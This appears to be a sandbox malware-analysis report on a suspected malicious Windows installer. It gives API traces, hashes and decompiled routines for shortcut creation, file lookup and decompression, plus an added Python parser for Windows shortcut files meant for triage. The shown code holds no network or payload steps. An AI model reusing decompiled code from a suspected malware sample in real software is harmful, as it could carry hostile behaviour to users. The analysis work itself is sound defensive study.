                  • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                  • Part of subcall function 004063D2: CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                  • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                  • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                  • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                • String ID: A$C:\Users\user\AppData\Local\Temp$Cgrlcpdlsle
                • API String ID: 2624150263-337181617
                • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E0040216B() {
                				signed int _t55;
                				void* _t59;
                				intOrPtr* _t63;
                				intOrPtr _t64;
                				intOrPtr* _t65;
                				intOrPtr* _t67;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr* _t73;
                				intOrPtr* _t75;
                				intOrPtr* _t78;
                				intOrPtr* _t80;
                				intOrPtr* _t82;
                				intOrPtr* _t84;
                				int _t87;
                				intOrPtr* _t95;
                				signed int _t105;
                				signed int _t109;
                				void* _t111;
                
                				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                				_t55 =  *(_t111 - 0x18);
                				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                				_t105 = _t55 & 0x00008000;
                				_t109 = _t55 >> 0x0000000c & 0x00000007;
                				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                				if(E00405AFC( *(_t111 - 0xc)) == 0) {
                					E00402BCE(0x21);
                				}
                				_t59 = _t111 + 8;
                				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                				if(_t59 < _t87) {
                					L15:
                					 *((intOrPtr*)(_t111 - 4)) = 1;
                					_push(0xfffffff0);
                				} else {
                					_t63 =  *((intOrPtr*)(_t111 + 8));
                					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                					 *((intOrPtr*)(_t111 - 8)) = _t64;
                					if(_t64 >= _t87) {
                						_t67 =  *((intOrPtr*)(_t111 + 8));
                						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                						if(_t105 == _t87) {
                							_t84 =  *((intOrPtr*)(_t111 + 8));
                							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp");
                						}
                						if(_t109 != _t87) {
                							_t82 =  *((intOrPtr*)(_t111 + 8));
                							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                						}
                						_t69 =  *((intOrPtr*)(_t111 + 8));
                						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                						if( *_t95 != _t87) {
                							_t80 =  *((intOrPtr*)(_t111 + 8));
                							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                						}
                						_t71 =  *((intOrPtr*)(_t111 + 8));
                						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                						_t73 =  *((intOrPtr*)(_t111 + 8));
                						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                							}
                						}
                						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                						 *((intOrPtr*)( *_t75 + 8))(_t75);
                					}
                					_t65 =  *((intOrPtr*)(_t111 + 8));
                					 *((intOrPtr*)( *_t65 + 8))(_t65);
                					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                						_push(0xfffffff4);
                					} else {
                						goto L15;
                					}
                				}
                				E00401423();
                				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
                				return 0;
                			}

                Statement addresses in this listing: 0x00402174 to 0x00402a69

                APIs
                • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 123533781-1943935188
                • Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                • Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                Uniqueness

                Uniqueness Score: -1.00%
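The COM calls in E0040216B above follow the IShellLinkA vtable layout (SetPath at +0x50, SetWorkingDirectory +0x24, SetShowCmd +0x3c, SetHotkey +0x34, SetIconLocation +0x44, SetArguments +0x2c, SetDescription +0x1c) and finish with IPersistFile::Save at +0x18 on the interface returned by QueryInterface, so the routine writes a .lnk shortcut. The packed flag word it unpacks is the icon index (low 12 bits), the show command (bits 12 to 14), bit 0x8000 (when clear, the Temp path string is passed as the working directory) and the hotkey (high 16 bits); MultiByteToWideChar converts the output path before Save. The Python below is an added example, not code from the sample or from the report: a minimal MS-SHLLINK writer and parser that shows where those setter values land in the file and how to read them back from a shortcut recovered from disk. The writer omits LinkTargetIDList and LinkInfo (a real shortcut stores the target path there); the parser skips both when present. All function names and the sample values are the example's own.

```python
import struct

# Constants from MS-SHLLINK (ShellLinkHeader and LinkFlags).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04            # StringData NAME_STRING            (IShellLink::SetDescription)
HAS_RELATIVE_PATH = 0x08   # StringData RELATIVE_PATH
HAS_WORKING_DIR = 0x10     # StringData WORKING_DIR            (SetWorkingDirectory)
HAS_ARGUMENTS = 0x20       # StringData COMMAND_LINE_ARGUMENTS (SetArguments)
HAS_ICON_LOCATION = 0x40   # StringData ICON_LOCATION          (SetIconLocation, path part)
IS_UNICODE = 0x80
# HeaderSize, LinkCLSID, LinkFlags, FileAttributes, CreationTime, AccessTime,
# WriteTime, FileSize, IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
HEADER_FMT = "<I16sIIQQQIiIHHII"
STRING_DATA_ORDER = (
    (HAS_NAME, "description"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def build_lnk(description=None, relative_path=None, working_dir=None,
              arguments=None, icon_location=None, icon_index=0,
              show_cmd=1, hotkey=0):
    """Serialize a ShellLinkHeader plus Unicode StringData (no IDList, no LinkInfo)."""
    flags = IS_UNICODE
    body = b""
    values = {"description": description, "relative_path": relative_path,
              "working_dir": working_dir, "arguments": arguments,
              "icon_location": icon_location}
    for flag, name in STRING_DATA_ORDER:
        value = values[name]
        if value is not None:
            flags |= flag
            # CountCharacters (UTF-16 code units), then the characters, no terminator.
            encoded = value.encode("utf-16-le")
            body += struct.pack("<H", len(encoded) // 2) + encoded
    header = struct.pack(HEADER_FMT, LNK_HEADER_SIZE, LNK_CLSID, flags, 0,
                         0, 0, 0, 0, icon_index, show_cmd, hotkey, 0, 0, 0)
    return header + body


def parse_lnk(data):
    """Return header fields and StringData of a shell link as a dict."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    (hdr_size, clsid, flags, _attrs, _ctime, _atime, _wtime, _fsize,
     icon_index, show_cmd, hotkey, _r1, _r2, _r3) = struct.unpack_from(HEADER_FMT, data, 0)
    if hdr_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    off = LNK_HEADER_SIZE
    # Skip LinkTargetIDList (2-byte size, not counting itself) and LinkInfo
    # (4-byte size that covers the whole structure); the target path lives there.
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, off)
        if link_info_size < 4:
            raise ValueError("bad LinkInfoSize")
        off += link_info_size
    result = {"icon_index": icon_index, "show_cmd": show_cmd,
              "hotkey": hotkey, "flags": flags}
    width = 2 if flags & IS_UNICODE else 1
    for flag, name in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, off)
        off += 2
        raw = data[off:off + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData")
        off += count * width
        result[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return result


if __name__ == "__main__":
    # Constructed sample values; the working directory mirrors the default
    # the decompiled routine passes to SetWorkingDirectory (show_cmd 7 = SW_SHOWMINNOACTIVE).
    blob = build_lnk(description="Runtime update",
                     working_dir=r"C:\Users\user\AppData\Local\Temp",
                     arguments="-silent", show_cmd=7, hotkey=0)
    for key, value in parse_lnk(blob).items():
        print(f"{key}: {value!r}")
```

When triaging a shortcut dropped by a sample, the fields the parser returns map one to one onto the setters called in the decompiled function, so a show command of 7 or an unexpected argument string is visible without opening the file in Explorer.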

                C-Code - Quality: 39%
                			E004027A1(char __ebx, char* __edi, char* __esi) {
                				void* _t19;
                
                				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                					E00406055(__edi, _t6);
                					_push(_t19 - 0x1a4);
                					_push(__esi);
                					E004060F7();
                				} else {
                					 *__edi = __ebx;
                					 *__esi = __ebx;
                					 *((intOrPtr*)(_t19 - 4)) = 1;
                				}
                				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
                				return 0;
                			}
                Statement addresses in this listing: 0x004027b9 to 0x00402a69

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                • Opcode Fuzzy Hash: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E00406945(signed int __ebx, signed int* __esi) {
                				signed int _t396;
                				signed int _t425;
                				signed int _t442;
                				signed int _t443;
                				signed int* _t446;
                				void* _t448;
                
                				L0:
                				while(1) {
                					L0:
                					_t446 = __esi;
                					_t425 = __ebx;
                					if( *(_t448 - 0x34) == 0) {
                						break;
                					}
                					L55:
                					__eax =  *(__ebp - 0x38);
                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                					__ecx = __ebx;
                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                					__ebx = __ebx + 8;
                					while(1) {
                						L56:
                						if(__ebx < 0xe) {
                							goto L0;
                						}
                						L57:
                						__eax =  *(__ebp - 0x40);
                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                						__ecx = __eax;
                						__esi[1] = __eax;
                						__ecx = __eax & 0x0000001f;
                						if(__cl > 0x1d) {
                							L9:
                							_t443 = _t442 | 0xffffffff;
                							 *_t446 = 0x11;
                							L10:
                							_t446[0x147] =  *(_t448 - 0x40);
                							_t446[0x146] = _t425;
                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                							L11:
                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                							_t446[0x26ea] =  *(_t448 - 0x30);
                							E004070B4( *(_t448 + 8));
                							return _t443;
                						}
                						L58:
                						__eax = __eax & 0x000003e0;
                						if(__eax > 0x3a0) {
                							goto L9;
                						}
                						L59:
                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                						__ebx = __ebx - 0xe;
                						_t94 =  &(__esi[2]);
                						 *_t94 = __esi[2] & 0x00000000;
                						 *__esi = 0xc;
                						while(1) {
                							L60:
                							__esi[1] = __esi[1] >> 0xa;
                							__eax = (__esi[1] >> 0xa) + 4;
                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                								goto L68;
                							}
                							L61:
                							while(1) {
                								L64:
                								if(__ebx >= 3) {
                									break;
                								}
                								L62:
                								if( *(__ebp - 0x34) == 0) {
                									goto L182;
                								}
                								L63:
                								__eax =  *(__ebp - 0x38);
                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                								__ecx = __ebx;
                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                								__ebx = __ebx + 8;
                							}
                							L65:
                							__ecx = __esi[2];
                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                							__ebx = __ebx - 3;
                							_t108 = __ecx + 0x408408; // 0x121110
                							__ecx =  *_t108;
                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                							__ecx = __esi[1];
                							__esi[2] = __esi[2] + 1;
                							__eax = __esi[2];
                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                								goto L64;
                							}
                							L66:
                							while(1) {
                								L68:
                								if(__esi[2] >= 0x13) {
                									break;
                								}
                								L67:
                								_t119 = __esi[2] + 0x408408; // 0x4000300
                								__eax =  *_t119;
                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                								_t126 =  &(__esi[2]);
                								 *_t126 = __esi[2] + 1;
                							}
                							L69:
                							__ecx = __ebp - 8;
                							__edi =  &(__esi[0x143]);
                							 &(__esi[0x148]) =  &(__esi[0x144]);
                							__eax = 0;
                							 *(__ebp - 8) = 0;
                							__eax =  &(__esi[3]);
                							 *__edi = 7;
                							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                							if(__eax != 0) {
                								L72:
                								 *__esi = 0x11;
                								while(1) {
                									L180:
                									_t396 =  *_t446;
                									if(_t396 > 0xf) {
                										break;
                									}
                									L1:
                									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
                										case 0:
                											L101:
                											__eax = __esi[4] & 0x000000ff;
                											__esi[3] = __esi[4] & 0x000000ff;
                											__eax = __esi[5];
                											__esi[2] = __esi[5];
                											 *__esi = 1;
                											goto L102;
                										case 1:
                											L102:
                											__eax = __esi[3];
                											while(1) {
                												L105:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L103:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L104:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L106:
                											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                											__eax = __eax &  *(__ebp - 0x40);
                											__ecx = __esi[2];
                											__eax = __esi[2] + __eax * 4;
                											__ecx =  *(__eax + 1) & 0x000000ff;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                											__ecx =  *__eax & 0x000000ff;
                											__eflags = __ecx;
                											if(__ecx != 0) {
                												L108:
                												__eflags = __cl & 0x00000010;
                												if((__cl & 0x00000010) == 0) {
                													L110:
                													__eflags = __cl & 0x00000040;
                													if((__cl & 0x00000040) == 0) {
                														goto L125;
                													}
                													L111:
                													__eflags = __cl & 0x00000020;
                													if((__cl & 0x00000020) == 0) {
                														goto L9;
                													}
                													L112:
                													 *__esi = 7;
                													goto L180;
                												}
                												L109:
                												__esi[2] = __ecx;
                												__esi[1] = __eax;
                												 *__esi = 2;
                												goto L180;
                											}
                											L107:
                											__esi[2] = __eax;
                											 *__esi = 6;
                											goto L180;
                										case 2:
                											L113:
                											__eax = __esi[2];
                											while(1) {
                												L116:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L114:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L115:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L117:
                											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                											__ecx = __eax;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - __eax;
                											__eflags = __ebx;
                											__eax = __esi[4] & 0x000000ff;
                											__esi[3] = __esi[4] & 0x000000ff;
                											__eax = __esi[6];
                											__esi[2] = __esi[6];
                											 *__esi = 3;
                											goto L118;
                										case 3:
                											L118:
                											__eax = __esi[3];
                											while(1) {
                												L121:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L119:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L120:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L122:
                											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                											__eax = __eax &  *(__ebp - 0x40);
                											__ecx = __esi[2];
                											__eax = __esi[2] + __eax * 4;
                											__ecx =  *(__eax + 1) & 0x000000ff;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                											__ecx =  *__eax & 0x000000ff;
                											__eflags = __cl & 0x00000010;
                											if((__cl & 0x00000010) == 0) {
                												L124:
                												__eflags = __cl & 0x00000040;
                												if((__cl & 0x00000040) != 0) {
                													goto L9;
                												}
                												L125:
                												__esi[3] = __ecx;
                												__ecx =  *(__eax + 2) & 0x0000ffff;
                												__esi[2] = __eax;
                												goto L180;
                											}
                											L123:
                											__esi[2] = __ecx;
                											__esi[3] = __eax;
                											 *__esi = 4;
                											goto L180;
                										case 4:
                											L126:
                											__eax = __esi[2];
                											while(1) {
                												L129:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L127:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L128:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L130:
                											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                											__ecx = __eax;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - __eax;
                											__eflags = __ebx;
                											 *__esi = 5;
                											goto L131;
                										case 5:
                											L131:
                											__eax =  *(__ebp - 0x30);
                											__edx = __esi[3];
                											__eax = __eax - __esi;
                											__ecx = __eax - __esi - 0x1ba0;
                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                											if(__eax - __esi - 0x1ba0 >= __edx) {
                												__ecx = __eax;
                												__ecx = __eax - __edx;
                												__eflags = __ecx;
                											} else {
                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                												__ecx = __esi[0x26e8] - __edx - __esi;
                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                											}
                											__eflags = __esi[1];
                											 *(__ebp - 0x20) = __ecx;
                											if(__esi[1] != 0) {
                												L135:
                												__edi =  *(__ebp - 0x2c);
                												do {
                													L136:
                													__eflags = __edi;
                													if(__edi != 0) {
                														goto L152;
                													}
                													L137:
                													__edi = __esi[0x26e8];
                													__eflags = __eax - __edi;
                													if(__eax != __edi) {
                														L143:
                														__esi[0x26ea] = __eax;
                														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                														__eax = __esi[0x26ea];
                														__ecx = __esi[0x26e9];
                														__eflags = __eax - __ecx;
                														 *(__ebp - 0x30) = __eax;
                														if(__eax >= __ecx) {
                															__edi = __esi[0x26e8];
                															__edi = __esi[0x26e8] - __eax;
                															__eflags = __edi;
                														} else {
                															__ecx = __ecx - __eax;
                															__edi = __ecx - __eax - 1;
                														}
                														__edx = __esi[0x26e8];
                														__eflags = __eax - __edx;
                														 *(__ebp - 8) = __edx;
                														if(__eax == __edx) {
                															__edx =  &(__esi[0x6e8]);
                															__eflags = __ecx - __edx;
                															if(__ecx != __edx) {
                																__eax = __edx;
                																__eflags = __eax - __ecx;
                																 *(__ebp - 0x30) = __eax;
                																if(__eax >= __ecx) {
                																	__edi =  *(__ebp - 8);
                																	__edi =  *(__ebp - 8) - __eax;
                																	__eflags = __edi;
                																} else {
                																	__ecx = __ecx - __eax;
                																	__edi = __ecx;
                																}
                															}
                														}
                														__eflags = __edi;
                														if(__edi == 0) {
                															goto L183;
                														} else {
                															goto L152;
                														}
                													}
                													L138:
                													__ecx = __esi[0x26e9];
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __ecx - __edx;
                													if(__ecx == __edx) {
                														goto L143;
                													}
                													L139:
                													__eax = __edx;
                													__eflags = __eax - __ecx;
                													if(__eax >= __ecx) {
                														__edi = __edi - __eax;
                														__eflags = __edi;
                													} else {
                														__ecx = __ecx - __eax;
                														__edi = __ecx;
                													}
                													__eflags = __edi;
                													if(__edi == 0) {
                														goto L143;
                													}
                													L152:
                													__ecx =  *(__ebp - 0x20);
                													 *__eax =  *__ecx;
                													__eax = __eax + 1;
                													__ecx = __ecx + 1;
                													__edi = __edi - 1;
                													__eflags = __ecx - __esi[0x26e8];
                													 *(__ebp - 0x30) = __eax;
                													 *(__ebp - 0x20) = __ecx;
                													 *(__ebp - 0x2c) = __edi;
                													if(__ecx == __esi[0x26e8]) {
                														__ecx =  &(__esi[0x6e8]);
                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                													}
                													_t357 =  &(__esi[1]);
                													 *_t357 = __esi[1] - 1;
                													__eflags =  *_t357;
                												} while ( *_t357 != 0);
                											}
                											goto L23;
                										case 6:
                											L156:
                											__eax =  *(__ebp - 0x2c);
                											__edi =  *(__ebp - 0x30);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L172:
                												__cl = __esi[2];
                												 *__edi = __cl;
                												__edi = __edi + 1;
                												__eax = __eax - 1;
                												 *(__ebp - 0x30) = __edi;
                												 *(__ebp - 0x2c) = __eax;
                												goto L23;
                											}
                											L157:
